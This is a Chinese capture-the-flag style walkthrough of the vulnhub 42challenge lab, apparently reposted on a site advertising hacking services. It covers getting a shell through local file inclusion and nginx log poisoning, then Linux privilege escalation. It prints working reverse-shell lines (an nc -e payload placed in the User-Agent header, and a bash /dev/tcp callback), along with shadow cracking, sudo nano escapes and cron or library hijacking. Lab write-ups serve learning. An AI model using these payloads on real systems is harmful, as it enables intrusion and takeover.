当前位置:首页 > 黑客服务 > 正文内容

记一次渗透后运用多种方式提权实战

访客4年前 (2021-04-04)黑客服务842

近期在学习Linux提权,完成了vulnhub上的42challenge靶场。该靶场在web渗透阶段表现的中规中矩,但在获得shell后的提权过程中,表现很出色。提权题目设计的逻辑严谨(不会出现突然的脑洞让你卡住),注重基础知识的考察,要求的知识面也很广,涉及到密码破解、程序逆向分析、第三方应用提权、进程提权、ssh免密登录、Linux ACL访问控制权限等方面的知识,属于不可多得的精品之作,下面就开始这次靶场实战之旅。

一、主机端口探测

利用命令arp-scan -l来发现靶机,然后看看靶机开放了哪些端口;

在利用nmap的脚本探测下端口可能存在的漏洞;

发现就开放了2个端口,22端口显然不是这里突破的重点,重点应该时web端口。

二、web渗透获取shell

访问下web看看;

看到这个第一直觉时命令执行漏洞,尝试输入:

127.0.0.1&whoami、127.0.0.1|whoami、127.0.0.1&&whoami、127.0.0.1||whoami都没有正确返回。后来有新的发现:

看到这个,联想到文件包含;

原来是本地包含,下面就利用日志来getshell。尝试了包含/var/log/auth.log,没有成功,那就不能利用ssh登录日志来获取shell,我们通过nmap扫描知道web的中间件是nginx,那我们就可以利用nginx日志来getshell。

1、nginx访问日志getshell

访问日志可以读取到;

写入shell:

curl -A "<?=system('nc -nv 192.168.0.3 8888 -e /bin/bash');?>" http://192.168.0.40/index.php

通过文件包含触发反弹;

接收反弹;

2、nginx错误日志getshell

错误日志也可读取到;

写入shell;

通过文件包含触发反弹;

接收反弹;

这里也可以将nc的反弹命令改为其他的反弹方式,比如一句话、php反弹或bash反弹都可以,就不逐个演示了,大家根据实际情况选择。

弹回了shell,下一步就该提权了,也到了本靶场的精华之处,开始提权的漫长之旅。

三、辅助脚本利用

有了www-data用户的shell,先尝试下有没有suid提权的可能;

没有线索,看下用户文件;

后来实践证明是要依次由这5个用户逐个提权,最后才能提权到root用户。

先上内核辅助脚本 linux-exploit-suggester.sh

要是内核可以提权,这靶场就没啥意思了;

在看看辅助脚本linpeas.sh的结果;(结果很多,就给出研判后可用的结果)

找了半天,去看看备份的密码文件。

四、shadow文件爆破

可以看到用户的密码文件;

然后用john来破解;

爆破作为最基础的一种方式,还是需要掌握对shadow文件的爆破方法。现在可以开心的ssh

连接了,进入下一个提权。

五、程序逆向分析---suid提权

ssh连接后,sudo -l 没有发现,但suid发现线索;

运行下试试;

祭出神器IDA来看看;

看的还是累,上gdb;

进入关键函数try,继续看;

在内存里发现了正确的密码;

提权成功,进行下一个阶段。

六、nano提权---sudo -l提权

这里考的是nano的sudo提权;

首先? sudo -u maria /bin/nano 进入界面;

然后在键盘上按住ctrl+r,

接着再按住ctrl+x;

现在就可以输入命令了;

完成了提权;

因为看着不方便,所以可以用bash重新反弹个通道;

echo "bash -i >& /dev/tcp/192.168.0.3/6666 0>&1" | bash

还可以用高端一点的方法,ssh免密登录。

ssh免密登录

kali下生成自己的公钥,口令为空;

靶机上创建 .ssh文件夹;

靶机上把kali的公钥放到认证文件里;

ssh免密登录;

接下来进行下一步提权。

七、进程提权

1、修改源文件提权

sudo因为没有密码,所以无法查看,suid没发现明显的线索,之前sudo -l和suid两种提权方式都试过了,这里应该考察其他方式了;

也没有考到计划任务提权;

运行下脚本pspy64试试;

发现线索,uid=1003 就是pedro用户;

既然Reporting_System_Info.sh定期运行,于是想到如果能修改该程序的内容,那就可以获得shell。

图中后面的+号表示 Linux ACL访问控制权限,类似于 Windows 系统中分配权限的方式,单独指定用户并单独分配权限,这样就解决了用户身份不足的问题。

可以看到我们不能直接修改Reporting_System_Info.sh,但是根据源码,程序要运行Send_Reporting_Email.sh,我们可以伪造/home/maria/Send_Reporting_Email.sh这个文件,也同样会执行;

到这里这一步提权完成,继续进行下一步;

2、修改python库文件提权

根据前面进程的监控发现;

uid=1004就是laura用户,根据前面的思路,我们同样想修改程序,先来看看程序的权限;

因为源文件不可以修改,思路是去修改源文件里调用的python库文件;

找到库文件的位置,同时发现库文件是可以修改的;

写入shell,等待执行;

反弹成功;

到这里除了root外所有的用户都提权过一遍,加油!

八、修改程序提权---sudo -l 提权

看到sudo -l 直接提权到root,最后一关简单点,不多解释了。当然,如果你感觉最后一关太简单了,不符合终极boss的气质,也可以玩个加强版。

九、加强版

在目录下发现可疑文件;

把程序拷贝出来,祭出神器IDA分析;

加密程序;

对应的解密程序;

由此可以看出,加密其实就是把明文加5,解密就是把密文减5,这里可以直接写个程序来跑,此处我们直接用动态调试来解决。

先运行下看看;

在打开文件处下断点,准备修改打开文件的参数;因为不修改参数的结果已经看到了,并不是我们想要的结果;

获取了root用户的密码,验证一下试试;

由最开始的ssh登录后直接就能切换到root用户了;

至此,整个靶机就打穿了,回顾一下,感觉还是很有乐趣的,思路很常规,没有脑洞点,但基础知识的考察范围很广,并具有一定的规律性,值得多做总结。

十、总结

扫描二维码推送至手机访问。

版权声明:本文由黑客接单发布,如需转载请注明出处。

本文链接:https://therlest.com/107375.html

分享给朋友:

“记一次渗透后运用多种方式提权实战” 的相关文章

贾秀东个人资料简介(简历及图片)

贾秀东人物概况 本页面提供了贾秀东个人资料简介(简历及图片),贾秀东是谁?贾秀东个人简介资料完整设计了网页求职找工作编辑个人简历作品所需要的贾秀东网站常用模板元素,不保证贾秀东人物数据真实,任何问题请联系管理员调整。 贾秀东图片 贾秀东个人资料简介 贾秀东,中国国际问题研究所特聘研究员。1...

吃鸡鸭的屁股会有病吗?我非常爱吃鸡鸭的屁股,但经常吃会有病吗?另

吃鸡鸭的屁股会有病吗?我非常爱吃鸡鸭的屁股,但经常吃会有病吗?另 鸡鸭的肛门附近组织,布满大大小小的腺体,各类秽物与毒素都在这些腺体囤积;鸡鸭的肛门也有非常高密度的大肠杆菌,所以鸡鸭的屁股不是少吃的问题,而是不能吃.吃得少可能没觉出怎样,多了问题就显出来了.而且鸡鸭屁股的大肠杆菌会随着蛋生出来的时...

古文化常识(中国古代文化常识大全)

1.中国古代文化常识 文学常识? 四本书:《论语》、《中庸》、《孟子大学》 五经:《诗经》《礼记》《周易》《春秋》 乐府双壁:木兰诗孔雀东南飞 三个字:警告世界,说真话,说真话,唤醒世界,说同样的话 第二枪:第一枪很厉害,第二枪也很厉害 三官:石渠官、潼关官、新安官 三次告别:新婚、老...

铁盖子可以放入高压锅蒸吗?装酱料的铁盖子,外面的涂层有些剥落,好

铁盖子可以放入高压锅蒸吗?装酱料的铁盖子,外面的涂层有些剥落,好 铁盖子可以放入高压锅蒸吗? 装酱料的铁盖子,外面的涂层有些剥落,好象也没锈,可以拿它盖严瓶子入高压锅蒸吗? 绝对不行!既危险又不卫生。盖住的瓶子在高压锅中加热,很容易形成压力差而爆炸;铁在高压锅中的水蒸汽作用下极易变成四氧化三...

山东价格协会(山东物流网)

东北等北方地区,可以去那里看一下。自己挑合适的,发往,我刚开一家物流公司,56888的软件配货,不知道物流价格是怎么算的. 衣服,哦,4008111111着是顺风快递的电话。而且显示正在备货。免费的东西总是会有不足的地方,在烟台住,济宁到济南一个)普通件,山东省服务标准化技术委员会物流分技术委员会于...

果蔬清洗机有用吗(果蔬清洗机有用吗_真的可以去农残吗_)

2019-01-0913:09:0622号喜欢5收藏5条评论家用果蔬清洗机这种小众的厨房电器产品,突然在网上出现了大量的宣传,给了很多懒朋友一个花钱的借口。部分宣传图片中,清洗前后对比明显的恶心图片,农药残留检测对比视频等。使许多人开始正视这种果蔬清洗机的功能。在准备点菜的时候,其实很多人都有些怀疑...

评论列表

息了三秋1
2年前 (2022-05-30)

弹命令改为其他的反弹方式,比如一句话、php反弹或bash反弹都可以,就不逐个演示了,大家根据实际情况选择。弹回了shell,下一步就该提权了,也到了本靶场的精华之处,开始提权的漫长之旅。三、辅助脚本利用有了www-data用户的shell,先尝试下有没有suid提权的

语酌岁笙
2年前 (2022-05-30)

为没有密码,所以无法查看,suid没发现明显的线索,之前sudo -l和suid两种提权方式都试过了,这里应该考察其他方式了;也没有考到计划任务提权;运行下脚本pspy64试试;发现线索,uid=1003 就是pedr

断渊空枝
2年前 (2022-05-30)

可以直接写个程序来跑,此处我们直接用动态调试来解决。先运行下看看;在打开文件处下断点,准备修改打开文件的参数;因为不修改参数的结果已经看到了,并不是我们想要的结果;获取了root用户的密码,验证一下

余安做啡
2年前 (2022-05-30)

释了。当然,如果你感觉最后一关太简单了,不符合终极boss的气质,也可以玩个加强版。九、加强版在目录下发现可疑文件;把程序拷贝出来,祭出神器IDA分析;加密程序;对应的解密程序;由此可以看

酒奴温人
2年前 (2022-05-30)

ssh免密登录。ssh免密登录kali下生成自己的公钥,口令为空;靶机上创建 .ssh文件夹;靶机上把kali的公钥放到认证文件里;ssh免密登录;接下来进行下一步提权。

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。